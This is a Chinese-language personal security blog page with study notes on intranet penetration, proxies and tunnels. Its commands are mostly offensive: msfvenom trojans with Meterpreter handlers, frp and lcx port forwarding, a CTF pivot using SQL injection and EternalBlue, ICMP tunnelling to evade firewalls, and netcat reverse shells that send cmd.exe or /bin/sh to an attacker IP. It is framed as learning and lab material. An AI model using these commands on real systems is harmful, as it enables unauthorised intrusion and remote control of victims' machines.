<!DOCTYPE html>
<html lang="zh-CN">

<head>

  <!-- Minima -->
  <!-- Hexo theme created by @adisaktijrs -->

  <!-- Basic Page Needs
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <meta charset="utf-8">

  
  <title>内网穿透</title>
  
  <link rel="canonical" href="https://r0sew1thh3r.github.io/2022/08/06/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/">
  
  <meta name="description" content="代理解决内网之间的通信问题。 主要解决这三类情况：内网有外网、内网有过滤、内网无外网 花生壳内网穿透首先在花生壳建立自定义映射，选择的协议要和msf生成的木马一致，这里我选的是tcp的。然后是映射到我本地的kali上，再开一台win7虚拟机作为被控制者。 msf生成木马： msfvenom -p w">
  
  
  <meta name="author" content="R0seW1thH3r">
  
  
  
  <meta property="og:site_name" content="R0seW1thH3r" />
  <meta property="og:type" content="article" />
  <meta property="og:title" content="内网穿透" />
  
  <meta property="og:description" content="代理解决内网之间的通信问题。 主要解决这三类情况：内网有外网、内网有过滤、内网无外网 花生壳内网穿透首先在花生壳建立自定义映射，选择的协议要和msf生成的木马一致，这里我选的是tcp的。然后是映射到我本地的kali上，再开一台win7虚拟机作为被控制者。 msf生成木马： msfvenom -p w">
  
  <meta property="og:url" content="https://r0sew1thh3r.github.io/2022/08/06/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/" />

  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="内网穿透">
  
  <meta name="twitter:description" content="代理解决内网之间的通信问题。 主要解决这三类情况：内网有外网、内网有过滤、内网无外网 花生壳内网穿透首先在花生壳建立自定义映射，选择的协议要和msf生成的木马一致，这里我选的是tcp的。然后是映射到我本地的kali上，再开一台win7虚拟机作为被控制者。 msf生成木马： msfvenom -p w">
  
  
  
  
  <meta name="twitter:url" content="https://r0sew1thh3r.github.io/2022/08/06/%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/" />

  <!-- Mobile Specific Metas
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <!-- Preload fonts
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <link rel="preload" href="/fonts/dm-serif-display-v4-latin-regular.woff2" as="font" type="font/woff2" crossorigin>
  <link rel="preload" href="/fonts/inter-v2-latin-regular.woff2" as="font" type="font/woff2" crossorigin>

  <!-- CSS
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  
<link rel="stylesheet" href="/css/normalize.css">

  
<link rel="stylesheet" href="/css/skeleton.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
<link rel="stylesheet" href="/css/prism-dark.css">

  
<link rel="stylesheet" href="/css/prism-line-numbers.css">

  <!-- User css -->
  
  
<link rel="stylesheet" href="/css/user.css">

  

  <!-- Favicon
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <link rel="icon" type="image/png" href="/images/favicon.png">

  <!-- Custom Theme Color Style
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  <style>
  a:not(.icon) {
    text-decoration-color: #0FA0CE;
    background-image: linear-gradient(
      to bottom,
      rgba(0, 0, 0, 0) 50%,
      #0FA0CE 50%
    );
  }
  blockquote {
    border-left: 8px solid #0FA0CE;
  }
  .nanobar .bar {
    background: #0FA0CE;
  }
  .button.button-primary:hover,
  button.button-primary:hover,
  input[type="submit"].button-primary:hover,
  input[type="reset"].button-primary:hover,
  input[type="button"].button-primary:hover,
  .button.button-primary:focus,
  button.button-primary:focus,
  input[type="submit"].button-primary:focus,
  input[type="reset"].button-primary:focus,
  input[type="button"].button-primary:focus {
    background-color: #0FA0CE;
    border-color: #0FA0CE;
  }
  input[type="email"]:focus,
  input[type="number"]:focus,
  input[type="search"]:focus,
  input[type="text"]:focus,
  input[type="tel"]:focus,
  input[type="url"]:focus,
  input[type="password"]:focus,
  textarea:focus,
  select:focus {
    border: 1px solid #0FA0CE;
  }
</style>

  <!-- Google Analytics (With Privacy Settings On)
  –––––––––––––––––––––––––––––––––––––––––––––––––– -->
  

  
  <script src="/js/pic.min.js" defer></script>
  

  

<meta name="generator" content="Hexo 6.1.0"></head>

<body>
  <div class="container">
    <div class="row">
      <div>

        <div class="row">
  <div class="two columns" style="max-width: 50px">
    <h1 class="mt-2 mode">
      <div onclick=setDarkMode(true) id="darkBtn">🌑</div>
      <div onclick=setDarkMode(false) id="lightBtn" class=hidden>☀️</div>
      <script >
        if (localStorage.getItem('preferredTheme') == 'dark') {
          setDarkMode(true)
        }
        function setDarkMode(isDark) {
          var darkBtn = document.getElementById('darkBtn')
          var lightBtn = document.getElementById('lightBtn')
          if (isDark) {
            lightBtn.style.display = "block"
            darkBtn.style.display = "none"
            localStorage.setItem('preferredTheme', 'dark');
          } else {
            lightBtn.style.display = "none"
            darkBtn.style.display = "block"
            localStorage.removeItem('preferredTheme');
          }
          document.body.classList.toggle("darkmode");
        }
      </script>
    </h1>
  </div>

  <div class="six columns ml-1">
    <h1 class="mt-2">
      Hi Folks.
    </h1>
  </div>

  <div class="twelve columns">
    <div class="row">
      <div class="nine columns left">
        <a href="/">Home</a>
        
          
          <a href="/tags" class="ml">Tags</a>
          
        
          
          <a href="/about" class="ml">About</a>
          
        
        
      </div>
    </div>
    <hr style="margin-bottom: 2.6rem">
  </div>
</div>
<link rel="stylesheet" href="/js/prism/prism.css">
        <div class="trans">
            <h2>内网穿透</h2>

  <h1 id="代理"><a href="#代理" class="headerlink" title="代理"></a>代理</h1><p>解决内网之间的通信问题。</p>
<p>主要解决这三类情况：内网有外网、内网有过滤、内网无外网</p>
<h2 id="花生壳内网穿透"><a href="#花生壳内网穿透" class="headerlink" title="花生壳内网穿透"></a>花生壳内网穿透</h2><p>首先在花生壳建立自定义映射，选择的协议要和msf生成的木马一致，这里我选的是tcp的。然后是映射到我本地的kali上，再开一台win7虚拟机作为被控制者。</p>
<p>msf生成木马：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p windows/x64/meterpreter/reverse_tcp <span class="token assign-left variable">lhost</span><span class="token operator">=</span>外网ip <span class="token assign-left variable">lport</span><span class="token operator">=</span><span class="token number">37322</span> --platform win -f exe -o /home/kali/Desktop/54320.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>注意这里的lhost是花生壳提供给我们的ip&#x2F;域名，lport也是花生壳提供ip的端口。然后把木马放到win7上。</p>
<p>开启msf监听，下面lhost和lport就是我们在花生壳上映射绑定的本地kali的ip和对应端口。</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfconsole
use exploit/multi/handler
<span class="token builtin class-name">set</span> payload windows/x64/meterpreter/reverse_tcp
<span class="token builtin class-name">set</span> LHOST <span class="token number">192.168</span>.1.20
<span class="token builtin class-name">set</span> LPORT <span class="token number">4444</span>
exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>当win7的木马开始运行时，msf就可以控制win7了。</p>
<h2 id="frp内网穿透"><a href="#frp内网穿透" class="headerlink" title="frp内网穿透"></a>frp内网穿透</h2><p>先下载frp</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token comment"># 下载frp可执行包</span>
<span class="token function">wget</span> https://github.com/fatedier/frp/releases/download/v0.43.0/frp_0.43.0_linux_386.tar.gz
<span class="token comment"># 解压</span>
<span class="token function">tar</span> zxf frp_0.43.0_linux_386.tar.gz<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>vps和本地kali都要下载。vps修改frps.ini；kali修改frpc.ini。</p>
<pre class="line-numbers language-none"><code class="language-none">vps的frps.ini：
[common]
bind_port &#x3D; 6677
-----------------------------------------
kali的frpc.ini：
[common]
server_addr &#x3D; vps的ip
server_port &#x3D; 6677

[ssh]
type &#x3D; tcp
local_ip &#x3D; 127.0.0.1
local_port &#x3D; 5555
remote_port &#x3D; 6000<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>启动</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">在vps上命令：
./frps -c ./frps.ini
kali上
./frpc -c ./frpc.ini<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后制作木马：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfvenom -p windows/x64/meterpreter/reverse_tcp <span class="token assign-left variable">lhost</span><span class="token operator">=</span>vps的ip <span class="token assign-left variable">lport</span><span class="token operator">=</span><span class="token number">6000</span> --platform win -f exe -o /home/kali/Desktop/frp.exe<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>传到win7上，kali开启msf监听</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">msfconsole
use exploit/multi/handler
<span class="token builtin class-name">set</span> payload windows/x64/meterpreter/reverse_tcp
<span class="token builtin class-name">set</span> LHOST <span class="token number">127.0</span>.0.1
<span class="token builtin class-name">set</span> LPORT <span class="token number">5555</span>
exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>简单原理图：</p>
<p><img src="/./images/frp.png" alt="frp"></p>
<h2 id="CFS三层内网漫游-某CTF线下"><a href="#CFS三层内网漫游-某CTF线下" class="headerlink" title="CFS三层内网漫游-某CTF线下"></a>CFS三层内网漫游-某CTF线下</h2><p><img src="/images/xd12.png" alt="xd12"></p>
<p>首先浏览器访问192.168.22.129:80，拿下webshell后，连接蚁剑，得到第一个flag。</p>
<p>用msf制作一个后门，上传到Target 1，使用蚁剑的终端运行后门。然后用msf连接，</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">制作后门：
msfvenom -p linux/x64/meterpreter/reverse_tcp <span class="token assign-left variable">lhost</span><span class="token operator">=</span><span class="token number">192.168</span>.76.x <span class="token assign-left variable">lport</span><span class="token operator">=</span><span class="token number">1111</span> -f elf -o /home/kali/Desktop/t1.elf
接受反弹：
msfconsole
use exploit/multi/handler
<span class="token builtin class-name">set</span> payload linux/x64/meterpreter/reverse_tcp
<span class="token builtin class-name">set</span> LHOST <span class="token number">192.168</span>.76.x
<span class="token builtin class-name">set</span> LPORT <span class="token number">1111</span>
exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>连接上后进行信息搜集：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">获取网络接口：run get_local_subnets
查看路由地址：run autoroute -p
添加路由地址：run autoroute -s <span class="token number">192.168</span>.22.0/24<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>发现存在22这个网段，于是使用命令开启这个网段的路由，使当前会话可以连接到22网段。但是我们只能在msf里连通22网段。我们可以开一个接口作为代理，让所有走这个代理的数据都可以连接到22网段。</p>
<p>开启本地代理：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">use auxiliary/server/socks4a
<span class="token builtin class-name">set</span> srvport <span class="token number">2222</span>
exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>凡是数据走的是2222这个端口出去的，那么就可以联通22网段。</p>
<p>然后我们使用proxychains调用nmap扫描22网段。</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">文件所在路径：/etc/proxychains4.conf
最后一行修改为：	socks4	<span class="token number">192.168</span>.76.x <span class="token number">2222</span>
调用nmap：
proxychains4 nmap -sT -Pn <span class="token number">192.168</span>.22.0/24 -p80<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后扫到了80端口是开放的。我们把浏览器代理设置为socks4后，可以打开这个网站。</p>
<p>sql注入拿到后台密码，登录后台利用修改配置文件的功能点，getshell，拿到第二个flag。</p>
<p>然后使用蚁剑连接，注意我们也要给蚁剑设置代理socks4。可以直接在蚁剑设置里配置，也可以使用其他代理工具。比如<code>Proxifier</code> 、<code>SocksCap64</code> </p>
<p>由于Target2不能连接到本地kali，而kali可以通过Target1的路由连接到Target2，所以采用正向连接，我kali攻击者主动找被控端。</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">生成正向后门：
msfvenom -p linux/x64/meterpreter/bind_tcp <span class="token assign-left variable">lport</span><span class="token operator">=</span><span class="token number">3333</span> -f elf -o /home/kali/Desktop/t2.elf
访问接收：
msfconsole
use exploit/multi/handler
<span class="token builtin class-name">set</span> payload linux/x64/meterpreter/bind_tcp
<span class="token builtin class-name">set</span> rHOST <span class="token number">192.168</span>.22.128
<span class="token builtin class-name">set</span> LPORT <span class="token number">3333</span>
exploit<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>然后我们就拿到了Target2的会话。和之前一样添加33路由，可以再开一个端口使用proxychain4搞nmap，开放着445、3389。</p>
<p>使用永恒之蓝攻击：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">use expoit/windows/smb/ms17_010_psexec
<span class="token builtin class-name">set</span> payload windows/meterpreter/bind_tcp
<span class="token builtin class-name">set</span> rhost <span class="token number">192.168</span>.33.33
exploit
shell
<span class="token function">dir</span> /S flag.txt /B
<span class="token builtin class-name">type</span> xxxx.txt<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>拿到最后一个flag。</p>
<h1 id="隧道"><a href="#隧道" class="headerlink" title="隧道"></a>隧道</h1><p>代理只是解决了通信的问题，但是在实际网络中，通常会通过各种边界设备、软&#x2F;硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。隧道就是一种绕过端口屏蔽的通信方式。通过封装成防火墙允许的数据包类型或端口绕过防火墙，到达之后还原数据，并将其发送到相应服务器上。</p>
<p>常用的隧道技术有以下三种：</p>
<ul>
<li>网络层：IPv6 隧道、ICMP 隧道</li>
<li>传输层：TCP 隧道、UDP 隧道、常规端口转发</li>
<li>应用层：SSH 隧道、HTTP&#x2F;S 隧道、DNS 隧道</li>
</ul>
<h2 id="检测连通性"><a href="#检测连通性" class="headerlink" title="检测连通性"></a>检测连通性</h2><ol>
<li><p>TCP 协议</p>
<p>“瑞士军刀”——netcat</p>
</li>
</ol>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token function">nc</span> <span class="token function">ip</span> 端口<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ol start="2">
<li><p>HTTP 协议</p>
<p>“curl”工具，如果开启了相应端口，且内网可以连接外网的话，就会输出相应的端口信息。</p>
</li>
</ol>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token function">curl</span> ip:端口<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ol start="3">
<li><p>ICMP 协议</p>
<p>“ping” 命令</p>
</li>
</ol>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token function">ping</span> ip/域名<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<ol start="4">
<li>DNS 协议</li>
</ol>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">windows：nslookup
linux：dig<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>



<h2 id="网络层ICMP"><a href="#网络层ICMP" class="headerlink" title="网络层ICMP"></a>网络层ICMP</h2><p>工具：</p>
<ul>
<li>老版本：<a target="_blank" rel="noopener" href="https://github.com/f1vefour/ptunnel">ptunnel</a> (需自行编译)</li>
<li>新版本：<a target="_blank" rel="noopener" href="https://github.com/esrrhs/pingtunnel">pingtunnel</a> (二次开发版)</li>
</ul>
<p>pingtunnel 是把 tcp&#x2F;udp&#x2F;sock5 流量伪装成 icmp 流量进行转发的工具。</p>
<p>首先我们是控制了webserver的，要使用这个工具就先下载，在控制机命令行执行：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token comment">#安装libpcap的依赖环境</span>
<span class="token function">apt-get</span> <span class="token function">install</span> byacc
<span class="token function">apt-get</span> <span class="token function">install</span> flex bison

<span class="token comment">#安装libpcap依赖库</span>
<span class="token function">wget</span> http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
<span class="token function">tar</span> -xzvf libpcap-1.9.0.tar.gz
<span class="token builtin class-name">cd</span> libpcap-1.9.0
./configure
<span class="token function">make</span> <span class="token operator">&amp;&amp;</span> <span class="token function">make</span> <span class="token function">install</span>

打开 /etc目录下的文件ld.so.conf ，添加两行
/usr/local/lib
/usr/lib
然后在终端下执行从新加载配置的命令：
ldconfig

<span class="token comment">#安装PingTunnel</span>
<span class="token function">wget</span> http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
<span class="token function">tar</span> -xzvf PingTunnel-0.72.tar.gz
<span class="token builtin class-name">cd</span> PingTunnel
<span class="token function">make</span> <span class="token operator">&amp;&amp;</span> <span class="token function">make</span> <span class="token function">install</span>

注：部分出错原因：
安装make： yum -y <span class="token function">install</span> gcc automake autoconf libtool <span class="token function">make</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>部分参数含义：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">-p	 <span class="token comment">##表示连接 icmp 隧道另一端的机器 IP（即目标服务器）</span>
-lp	 <span class="token comment">##表示需要监听的本地 tcp 端口</span>
-da  <span class="token comment">##指定需要转发的机器的 IP（即目标内网某一机器的内网 IP）</span>
-dp	 <span class="token comment">##指定需要转发的机器的端口（即目标内网某一机器的内网端口）</span>
-x	 <span class="token comment">##设置连接的密码</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p><strong>一次实例</strong>：</p>
<table>
<thead>
<tr>
<th align="center">DC</th>
<th align="center">Ubuntu</th>
<th align="center">kali</th>
</tr>
</thead>
<tbody><tr>
<td align="center">10.1.1.1</td>
<td align="center">10.1.1.5  &#x2F;   192.168.27.136</td>
<td align="center">192.168.27.135</td>
</tr>
</tbody></table>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token comment">#安装好后执行以下命令，-x是密码。</span>
Ubuntu：ptunnel -x asd

<span class="token comment">#-p是Ubuntu的ip； </span>
<span class="token comment">#-lp是本地的端口，表示把数据转发到我们kali的1080端口；</span>
<span class="token comment">#-da是目标内网的某一台我们想要控制的机器ip，-dp是其端口； </span>
<span class="token comment">#-x是密码。</span>
kali：ptunnel -p <span class="token number">192.168</span>.27.136 -lp <span class="token number">1080</span> -da <span class="token number">10.1</span>.1.1 -dp <span class="token number">3389</span> -x asd

<span class="token comment">#把内网机的3389端口的请求数据给本地 1080</span>
kali：rdesktop <span class="token number">127.0</span>.0.1:1080<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h2 id="传输层lcx"><a href="#传输层lcx" class="headerlink" title="传输层lcx"></a>传输层lcx</h2><p>工具：</p>
<ul>
<li>windows：lcx</li>
<li>linux：portmap</li>
</ul>
<p><strong>lcx_记一次实例</strong>：</p>
<table>
<thead>
<tr>
<th align="center">DC</th>
<th align="center">win2003</th>
<th align="center">kali</th>
</tr>
</thead>
<tbody><tr>
<td align="center">10.1.1.1</td>
<td align="center">10.1.1.2   &#x2F;  192.168.27.134</td>
<td align="center">192.168.27.135</td>
</tr>
</tbody></table>
<p>首先DC和win2003上都要下载lcx。</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">DC：		lcx -slave <span class="token number">10.1</span>.1.2 <span class="token number">3131</span> <span class="token number">127.0</span>.0.1 <span class="token number">3389</span> //将DC的3389给跳板win2003的3131
win2k3：	lcx -listen <span class="token number">3131</span> <span class="token number">3333</span> 					//监听3131转发至3333
kali：	rdesktop <span class="token number">192.168</span>.27.134:3333			//kali从win2003的3333端口接收DC的3389<span class="token punctuation">(</span>远程桌面连接服务<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>



<h2 id="传输层NetCat"><a href="#传输层NetCat" class="headerlink" title="传输层NetCat"></a>传输层NetCat</h2><h3 id="双向连接反弹shell"><a href="#双向连接反弹shell" class="headerlink" title="双向连接反弹shell"></a>双向连接反弹shell</h3><p><strong>正向</strong>：攻击连接受害</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">受害：nc -ldp <span class="token number">1234</span> -e /bin/sh							//linux
 	 <span class="token function">nc</span> -ldp <span class="token number">1234</span> -e c:<span class="token punctuation">\</span>windows<span class="token punctuation">\</span>system32<span class="token punctuation">\</span>cmd.exe 	  //windows
攻击：nc 受害机IP <span class="token number">1234</span>	//主动连接<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p><strong>反向</strong>：受害连接攻击</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">攻击：nc -lvp <span class="token number">1234</span>
受害：nc 攻击机IP <span class="token number">1234</span> -e /bin/sh							//linux
	 <span class="token function">nc</span> 攻击机IP <span class="token number">1234</span> -e c:<span class="token punctuation">\</span>windows<span class="token punctuation">\</span>system32<span class="token punctuation">\</span>cmd.exe	  //windows<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>



<h3 id="多向连接反弹shell"><a href="#多向连接反弹shell" class="headerlink" title="多向连接反弹shell"></a>多向连接反弹shell</h3><p><strong>反向</strong>：</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">Webserver：	Lcx.exe -listen <span class="token number">2222</span> <span class="token number">3333</span>
Sqlserver：	<span class="token function">nc</span> Webserver的内网IP <span class="token number">2222</span> -e c:<span class="token punctuation">\</span>windows<span class="token punctuation">\</span>system32<span class="token punctuation">\</span>cmd.exe
kali：		<span class="token function">nc</span> -v Webserver的外网IP <span class="token number">3333</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<hr>
<p>学习链接：<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1JZ4y1c7ro?p=69&vd_source=24835676c297246e6d7893de694251ec">第70天：内网安全-域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili</a></p>

  <p><a class="classtest-link" href="/tags/%E5%86%85%E7%BD%91/" rel="tag">内网</a> — 2022年8月6日</p>
  


        </div>
        <div class="row mt-2">
  <h3>Search</h3>
  <div><input id="search-text" title="search" class="search-text" type="text" placeholder="search......"></div>
  <div style="margin-top: 1.5rem;">
    <ul id="result"></ul>
  </div>
</div>
        <div class="row mt-2">
  
    <div class="eight columns">
      <p id="madewith">Made with ❤ and
        <a class="footer-link icon" href="https://hexo.io" target="_blank" style="text-decoration: none;" rel="noreferrer" aria-label="Hexo.io">
        <svg class="hexo svg-hov" width="14" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><title>Hexo.js</title><path d="M12 .007L1.57 6.056V18.05L12 23.995l10.43-6.049V5.952L12 .007zm4.798 17.105l-.939.521-.939-.521V12.94H9.08v4.172l-.94.521-.938-.521V6.89l.939-.521.939.521v4.172h5.84V6.89l.94-.521.938.521v10.222z"/></svg>
        </a>
        
    </div>

    <!-- Sepcial thanks to https://simpleicons.org/ for the icons -->
    <div class="four columns mb-3 posisi" >
      
      <a class="ml-0 footer-link icon" href="https://github.com/" target="_blank" style="text-decoration: none" rel="noreferrer" aria-label="GitHub">
        <svg class="github svg-hov" width="18" role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>GitHub</title><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg>
      </a>
      

      

      
      <a class="ml-0 footer-link icon" href="https://twitter.com/" target="_blank" style="text-decoration: none" rel="noreferrer" aria-label="Twitter">
        <svg class="twitter svg-hov" width="18" role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>Twitter</title><path d="M23.954 4.569c-.885.389-1.83.654-2.825.775 1.014-.611 1.794-1.574 2.163-2.723-.951.555-2.005.959-3.127 1.184-.896-.959-2.173-1.559-3.591-1.559-2.717 0-4.92 2.203-4.92 4.917 0 .39.045.765.127 1.124C7.691 8.094 4.066 6.13 1.64 3.161c-.427.722-.666 1.561-.666 2.475 0 1.71.87 3.213 2.188 4.096-.807-.026-1.566-.248-2.228-.616v.061c0 2.385 1.693 4.374 3.946 4.827-.413.111-.849.171-1.296.171-.314 0-.615-.03-.916-.086.631 1.953 2.445 3.377 4.604 3.417-1.68 1.319-3.809 2.105-6.102 2.105-.39 0-.779-.023-1.17-.067 2.189 1.394 4.768 2.209 7.557 2.209 9.054 0 13.999-7.496 13.999-13.986 0-.209 0-.42-.015-.63.961-.689 1.8-1.56 2.46-2.548l-.047-.02z"/></svg>
      </a>
      

      
      <a class="ml-0 footer-link icon" href="https://instagram.com/" target="_blank" style="text-decoration: none" rel="noreferrer" aria-label="Instagram">
        <svg class="instagram svg-hov" width="18" role="img" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><title>Instagram</title><path d="M12 0C8.74 0 8.333.015 7.053.072 5.775.132 4.905.333 4.14.63c-.789.306-1.459.717-2.126 1.384S.935 3.35.63 4.14C.333 4.905.131 5.775.072 7.053.012 8.333 0 8.74 0 12s.015 3.667.072 4.947c.06 1.277.261 2.148.558 2.913.306.788.717 1.459 1.384 2.126.667.666 1.336 1.079 2.126 1.384.766.296 1.636.499 2.913.558C8.333 23.988 8.74 24 12 24s3.667-.015 4.947-.072c1.277-.06 2.148-.262 2.913-.558.788-.306 1.459-.718 2.126-1.384.666-.667 1.079-1.335 1.384-2.126.296-.765.499-1.636.558-2.913.06-1.28.072-1.687.072-4.947s-.015-3.667-.072-4.947c-.06-1.277-.262-2.149-.558-2.913-.306-.789-.718-1.459-1.384-2.126C21.319 1.347 20.651.935 19.86.63c-.765-.297-1.636-.499-2.913-.558C15.667.012 15.26 0 12 0zm0 2.16c3.203 0 3.585.016 4.85.071 1.17.055 1.805.249 2.227.415.562.217.96.477 1.382.896.419.42.679.819.896 1.381.164.422.36 1.057.413 2.227.057 1.266.07 1.646.07 4.85s-.015 3.585-.074 4.85c-.061 1.17-.256 1.805-.421 2.227-.224.562-.479.96-.899 1.382-.419.419-.824.679-1.38.896-.42.164-1.065.36-2.235.413-1.274.057-1.649.07-4.859.07-3.211 0-3.586-.015-4.859-.074-1.171-.061-1.816-.256-2.236-.421-.569-.224-.96-.479-1.379-.899-.421-.419-.69-.824-.9-1.38-.165-.42-.359-1.065-.42-2.235-.045-1.26-.061-1.649-.061-4.844 0-3.196.016-3.586.061-4.861.061-1.17.255-1.814.42-2.234.21-.57.479-.96.9-1.381.419-.419.81-.689 1.379-.898.42-.166 1.051-.361 2.221-.421 1.275-.045 1.65-.06 4.859-.06l.045.03zm0 3.678c-3.405 0-6.162 2.76-6.162 6.162 0 3.405 2.76 6.162 6.162 6.162 3.405 0 6.162-2.76 6.162-6.162 0-3.405-2.76-6.162-6.162-6.162zM12 16c-2.21 0-4-1.79-4-4s1.79-4 4-4 4 1.79 4 4-1.79 4-4 4zm7.846-10.405c0 .795-.646 1.44-1.44 1.44-.795 0-1.44-.646-1.44-1.44 0-.794.646-1.439 1.44-1.439.793-.001 1.44.645 1.44 1.439z"/></svg>
      </a>
      

      

    </div>
  
</div>
<script src="/js/prism/prism.js" async></script>
      </div>

    </div>

  </div>
  <script src="/js/nanobar.min.js"></script>

  <script>
    var options = {
      classname: 'nanobar',
      id: 'myNanobar'
    };
    var nanobar = new Nanobar(options);
    nanobar.go(30);
    nanobar.go(76);
    nanobar.go(100);
  </script>

</body>

</html>